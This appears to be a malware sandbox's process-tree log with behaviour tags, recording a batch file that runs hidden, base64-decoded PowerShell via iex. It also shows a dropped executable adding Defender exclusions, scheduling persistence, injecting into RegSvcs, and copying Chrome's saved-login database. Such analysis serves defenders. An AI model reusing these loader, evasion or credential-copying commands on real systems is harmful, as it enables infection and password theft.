C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\0c9e474f7402c958fe8c3cedb97a4830a67599f7a2766aee93cd0c41943db0c1.bat" "2⤵PID:936
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWershelL -W h -CoMMaNd "$CFrslKBWMWE='C:\Users\Admin\Downloads\0c9e474f7402c958fe8c3cedb97a4830a67599f7a2766aee93cd0c41943db0c1.bat';$KoVqNuQqdmR=-189144..-1;$tvUHaNyxsnB=[SYSTem.tExT.ENCOdINg]::utf8.GETsTrING([COnVert]::fRoMBase64stRiNG((geT-ConTeNt $CFrslKBWMWE -Raw)[$KoVqNuQqdmR]));iex $tvUHaNyxsnB"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1676 -
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /IM ping.exe /F4⤵
- Kills process with taskkill
PID:1408
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3036 -
C:\WIndows\SysWOW64\PING.EXEC:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t5⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1964
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zfba0pre\zfba0pre.cmdline"4⤵PID:2880
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2907.tmp" "c:\Users\Admin\AppData\Local\Temp\zfba0pre\CSC9237C56776FB4A9E835540DAFBC66D9C.TMP"5⤵PID:1588
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\0c9e474f7402c958fe8c3cedb97a4830a67599f7a2766aee93cd0c41943db0c1.bat" "2⤵PID:3312
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWershelL -W h -CoMMaNd "$CFrslKBWMWE='C:\Users\Admin\Downloads\0c9e474f7402c958fe8c3cedb97a4830a67599f7a2766aee93cd0c41943db0c1.bat';$KoVqNuQqdmR=-189144..-1;$tvUHaNyxsnB=[SYSTem.tExT.ENCOdINg]::utf8.GETsTrING([COnVert]::fRoMBase64stRiNG((geT-ConTeNt $CFrslKBWMWE -Raw)[$KoVqNuQqdmR]));iex $tvUHaNyxsnB"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4304 -
C:\Windows\system32\taskkill.exe"C:\Windows\system32\taskkill.exe" /IM ping.exe /F4⤵
- Kills process with taskkill
PID:4996
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2336 -
C:\WIndows\SysWOW64\PING.EXEC:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:3756
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z53byaog\z53byaog.cmdline"4⤵PID:2376
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3154.tmp" "c:\Users\Admin\AppData\Local\Temp\z53byaog\CSC4C9E202433DD4763989447E0D76B3694.TMP"5⤵PID:4092
-
-
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap491:190:7zEvent99822⤵PID:4976
-
-
C:\Users\Admin\Downloads\a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe"C:\Users\Admin\Downloads\a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe"2⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4660 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:940
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\jZhgVFz.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3232
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jZhgVFz" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2C4E.tmp"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2384
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵PID:3356
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:452
-
-
-
C:\Users\Admin\Downloads\a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe"C:\Users\Admin\Downloads\a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe"2⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1340 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\a7fc129cd3069c3c862c28990c131e3dae5fff42c5ab8cb034e8e8ea12bec94e.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2880
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\jZhgVFz.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3036
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jZhgVFz" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5561.tmp"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4408
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1688
-
-
-
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1084 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- System Location Discovery: System Language Discovery
PID:760
-
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵
- System Location Discovery: System Language Discovery
PID:1568
-
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:1044
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:4716
-
-
C:\Windows\SysWOW64\systray.exe"C:\Windows\SysWOW64\systray.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:1448 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb47ae46f8,0x7ffb47ae4708,0x7ffb47ae47183⤵PID:1160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:23⤵PID:3644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:33⤵PID:3948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:83⤵PID:1960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:13⤵PID:3840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:13⤵PID:5008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:13⤵PID:1692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:13⤵PID:1716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4064 /prefetch:83⤵PID:4128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4064 /prefetch:83⤵PID:2992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:13⤵PID:1736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:13⤵PID:1060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:13⤵PID:2536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:13⤵PID:2472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:13⤵PID:3768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:13⤵PID:1884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:13⤵PID:1788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:13⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:13⤵PID:3268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,1425390666755579973,9574456100663643761,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2044 /prefetch:83⤵PID:1100
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\SuspendCompress.xlsx"2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:220
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\SuspendCompress.xlsx"2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2352
-
-
C:\Program Files (x86)\Nybgh8\configufgxdx.exe"C:\Program Files (x86)\Nybgh8\configufgxdx.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1224
-
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Pictures\MountCheckpoint.bmp"2⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:2312
-
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Pictures\ConfirmResize.jpeg" /ForceBootstrapPaint3D2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Pictures\DismountClose.svg2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:920 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x84,0x7c,0xe4,0x80,0x108,0x7ffb47ae46f8,0x7ffb47ae4708,0x7ffb47ae47183⤵PID:4896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,10272569529427770586,5087934337360655992,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:23⤵PID:4984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,10272569529427770586,5087934337360655992,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:33⤵PID:876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,10272569529427770586,5087934337360655992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:83⤵PID:1900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,10272569529427770586,5087934337360655992,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:13⤵PID:1232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,10272569529427770586,5087934337360655992,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:13⤵PID:1732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,10272569529427770586,5087934337360655992,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:83⤵PID:2072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2188,10272569529427770586,5087934337360655992,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:83⤵PID:2040
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:1888 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb47ae46f8,0x7ffb47ae4708,0x7ffb47ae47183⤵PID:3496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,7704431769219422285,933191761998799007,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:23⤵PID:2380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,7704431769219422285,933191761998799007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:33⤵PID:4700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,7704431769219422285,933191761998799007,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:83⤵PID:2700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7704431769219422285,933191761998799007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:13⤵PID:4908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7704431769219422285,933191761998799007,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:13⤵PID:3116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7704431769219422285,933191761998799007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:13⤵PID:3108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7704431769219422285,933191761998799007,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4444 /prefetch:13⤵PID:4616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,7704431769219422285,933191761998799007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5288 /prefetch:83⤵PID:4320
-
-
